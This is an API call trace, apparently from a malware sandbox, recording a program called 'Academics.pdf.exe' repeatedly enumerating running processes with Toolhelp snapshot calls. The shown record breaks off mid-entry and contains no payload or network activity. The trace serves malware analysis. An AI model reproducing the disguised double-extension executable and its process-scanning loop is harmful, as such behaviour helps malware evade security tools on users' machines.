[0298.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0298.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0298.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0298.901] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0298.902] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0298.903] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0298.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0298.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0298.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0298.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0298.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0298.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0298.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0298.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0298.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0298.912] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0298.912] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0298.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0298.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.918] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0298.919] CloseHandle (hObject=0x294) returned 1 [0298.919] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0298.919] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.919] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0298.921] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.922] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0298.923] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0298.924] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.924] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0298.925] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0298.927] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0298.928] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0298.929] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0298.930] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.930] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.931] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.932] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.933] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.934] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0298.935] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.935] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.936] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0298.937] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0298.938] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0298.939] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0298.940] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.940] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0298.941] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0298.942] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0298.943] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0298.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0298.945] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0298.946] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0298.947] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0298.948] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0298.949] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0298.950] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0298.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0298.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0298.952] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0298.953] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0298.954] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0298.955] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0298.956] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0298.956] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0298.957] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.958] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.963] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0298.964] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0298.964] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0298.965] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.966] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0298.967] CloseHandle (hObject=0x294) returned 1 [0298.967] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.967] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0298.967] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0298.969] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0298.970] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0298.971] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0298.972] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.973] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0298.973] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0298.974] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0298.975] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0298.976] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, 